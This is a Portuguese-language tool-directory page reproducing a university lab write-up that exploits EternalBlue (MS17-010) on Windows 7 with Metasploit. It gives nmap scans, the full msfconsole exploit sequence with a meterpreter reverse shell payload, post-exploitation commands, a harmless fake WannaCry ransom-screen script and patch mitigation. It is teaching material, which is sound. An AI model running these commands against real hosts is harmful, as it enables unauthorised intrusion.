Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
EternalBlue-Exploit-Demonstration — Laboratório educacional demonstrando a exploração do EternalBlue (MS17-010) contra o Windows 7 usando Metasploit, incluindo pós-exploração, simulação do ransomware WannaCry e mitigação por patch em um ambiente isolado. | Kitploit
Ferramentas/GitHubGitHub/dannic145/eternalblue-exploit-demonstration
Frameworks de ExploraçãoGeração de PayloadsAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoAnálise de MalwareCTFTestes de PenetraçãoAprendizado e Educação
Red Teaming
Labs e Prática
GitHubdannic145/eternalblue-exploit-demonstration

EternalBlue-Exploit-Demonstration

Laboratório educacional demonstrando a exploração do EternalBlue (MS17-010) contra o Windows 7 usando Metasploit, incluindo pós-exploração, simulação do ransomware WannaCry e mitigação por patch em um ambiente isolado.

Ver Repositório
5há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Demonstração de Exploração do EternalBlue (MS17-010)

Laboratório de cibersegurança demonstrando a exploração do CVE-2017-0144 (EternalBlue) usando Metasploit contra um sistema Windows 7 vulnerável, obtendo acesso de nível SYSTEM via Meterpreter.

Este projeto também simula um ataque de ransomware estilo WannaCry (DEMONSTRAÇÃO SEGURA) e demonstra a mitigação usando o patch de segurança MS17-010.


Informações do Módulo

Módulo: CSCM828 Security Vulnerabilities and Penetration Testing

Estudantes:

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

Universidade: Swansea University


Recursos e Downloads

  1. MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212 (Atualização de Segurança do Windows 7 x64)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux (Download de Máquinas Virtuais)
    https://www.kali.org/get-kali/#kali-virtual-machines

Windows 7 SP1 Home Premium English x64 (ISO)

https://archive.org/details/windows-7-home-prem-english
  • VMware Workstation Pro 17.6.4
    https://www.vmware.com/products/desktop-hyper


  • 1. Visão Geral

    Este laboratório demonstra:

    • Exploração remota da vulnerabilidade SMB (MS17-010)
    • Acesso ao nível de kernel via EternalBlue
    • Estabelecimento de sessão Meterpreter
    • Técnicas de pós-exploração
    • Simulação de ransomware estilo WannaCry (segura)
    • Mitigação através de patches

    2. Ambiente do Laboratório

    Requisitos

    • VMware Workstation / VirtualBox
    • Mínimo de 8GB de RAM

    Máquina Atacante

    • Kali Linux
    • Metasploit Framework

    Máquina Vítima

    • Windows 7 SP1 x64 (Sem patch)

    Rede

    • Host-only / NAT (ambiente isolado)
    • Garanta que ambas as máquinas consigam comunicar entre si

    ⚠️ Este laboratório deve ser conduzido em um ambiente totalmente isolado.


    3. Configuração da Vítima (Windows 7)

    Execute no Prompt de Comando como Administrador:

    Desativar Firewall

    root@kitploit:~
    netsh advfirewall set allprofiles state off
    

    Verificar Porta SMB

    root@kitploit:~
    netstat -an | findstr :445
    

    Desativar Atualizações (para estabilidade do laboratório)

    root@kitploit:~
    sc stop wuauserv
    sc config wuauserv start= disabled
    

    4. Configuração do Atacante (Kali Linux)

    Verificar Conectividade

    root@kitploit:~
    ping <victim-ip>
    nmap -p 445 <victim-ip>
    

    5. Passos da Exploração

    Passo 1: Escanear o Alvo

    root@kitploit:~
    nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>
    

    Esperado:

    • O host está VULNERÁVEL

    Passo 2: Executar o Exploit

    root@kitploit:~
    msfconsole
    use exploit/windows/smb/ms17_010_eternalblue
    set RHOSTS <victim-ip>
    set LHOST <attacker-ip>
    set PAYLOAD windows/x64/meterpreter/reverse_tcp
    run
    

    Passo 3: Confirmar Acesso

    root@kitploit:~
    meterpreter > getuid
    

    Esperado:

    root@kitploit:~
    NT AUTHORITY\SYSTEM
    

    6. Pós-Exploração

    root@kitploit:~
    sysinfo
    getuid
    ps
    screenshot
    shell
    whoami
    ipconfig
    

    Migração Estável

    root@kitploit:~
    ps
    migrate <explorer.exe PID>
    

    7. Simulação do WannaCry (DEMONSTRAÇÃO SEGURA)

    Criar Payload (Kali)

    root@kitploit:~
    cat > /tmp/wannacry64.bat << 'EOF'
    @echo off
    title WannaCryptor Demo - SAFE SIMULATION
    color 0a
    mode con: cols=80 lines=25
    cls
    
    setlocal enabledelayedexpansion
    
    set id=%random%-%random%-%random%
    set /a timeleft=60
    
    :main
    cls
    echo ========================================================
    echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
    echo ========================================================
    echo.
    echo  All files have been encrypted!
    echo.
    echo  Send 0.25 BTC to:
    echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
    echo.
    echo  Personal ID: %id%
    echo.
    echo  Time remaining: !timeleft! seconds
    echo.
    echo ========================================================
    echo.
    
    echo Initializing encryption...
    timeout /t 2 >nul
    
    for /l %%i in (1,1,20) do (
        set /a percent=%%i*5
        call :progress !percent!
        timeout /t 1 >nul
    )
    
    goto countdown
    
    :progress
    set bar=
    set /a blocks=%1/5
    for /l %%b in (1,1,!blocks!) do set bar=!bar!#
    cls
    echo ========================================================
    echo           ENCRYPTING FILES...
    echo ========================================================
    echo.
    echo Progress: [%bar%] %1%%
    echo.
    
    set /a randfile=%random% %% 5
    if !randfile!==0 echo Encrypting: documents.docx
    if !randfile!==1 echo Encrypting: photos.jpg
    if !randfile!==2 echo Encrypting: database.sql
    if !randfile!==3 echo Encrypting: backup.zip
    if !randfile!==4 echo Encrypting: project.pptx
    
    exit /b
    
    :countdown
    cls
    
    :loop
    cls
    echo ========================================================
    echo           YOUR FILES ARE ENCRYPTED
    echo ========================================================
    echo.
    echo  Pay within the time limit or files will be lost!
    echo.
    echo  Time remaining: !timeleft! seconds
    echo.
    echo ========================================================
    echo.
    
    if !timeleft! LEQ 0 goto end
    
    set /a timeleft-=1
    timeout /t 1 >nul
    goto loop
    
    :end
    cls
    echo ========================================================
    echo              TIME EXPIRED
    echo ========================================================
    echo.
    echo  Your files are permanently locked.
    echo.
    echo  (This was a SAFE DEMO simulation)
    echo.
    echo ========================================================
    pause
    EOF
    

    Upload e Execução

    root@kitploit:~
    meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
    meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"
    

    8. Mitigação (Demonstração do Patch)

    Passo 1: Baixar o Patch

    • Visite: https://www.catalog.update.microsoft.com/
    • Pesquise: KB4012212 Windows 7 x64
    • Baixe o arquivo .msu

    Passo 2: Instalar o Patch

    root@kitploit:~
    wusa.exe KB4012212-x64.msu /quiet /norestart
    

    Passo 3: Reiniciar

    root@kitploit:~
    shutdown /r /t 0
    

    Passo 4: Verificar o Patch

    root@kitploit:~
    systeminfo | findstr KB4012212
    

    Passo 5: Reexecutar o Exploit

    Esperado:

    • O exploit falha
    • Nenhuma sessão Meterpreter

    Passo 6: Verificar com Nmap

    root@kitploit:~
    nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>
    

    Esperado:

    • NÃO VULNERÁVEL

    9. Resolução de Problemas

    ProblemaSolução
    O exploit falhaVerifique a conectividade
    Sem sessãoDesative o firewall
    A sessão caiTente o exploit novamente
    Sem janela visívelMigre para explorer.exe

    10. Considerações Éticas

    Este projeto é realizado:

    • Apenas em máquinas de laboratório controladas
    • Em uma rede totalmente isolada
    • Apenas para fins educacionais

    O uso não autorizado viola:

    • UK Computer Misuse Act 1990

    11. Conclusão

    Este laboratório demonstra:

    • Exploração SMB no mundo real usando EternalBlue
    • Comprometimento de nível SYSTEM do Windows 7
    • Simulação de ataque de ransomware (segura)
    • Importância da aplicação de patches em tempo hábil
    Baixar ferramenta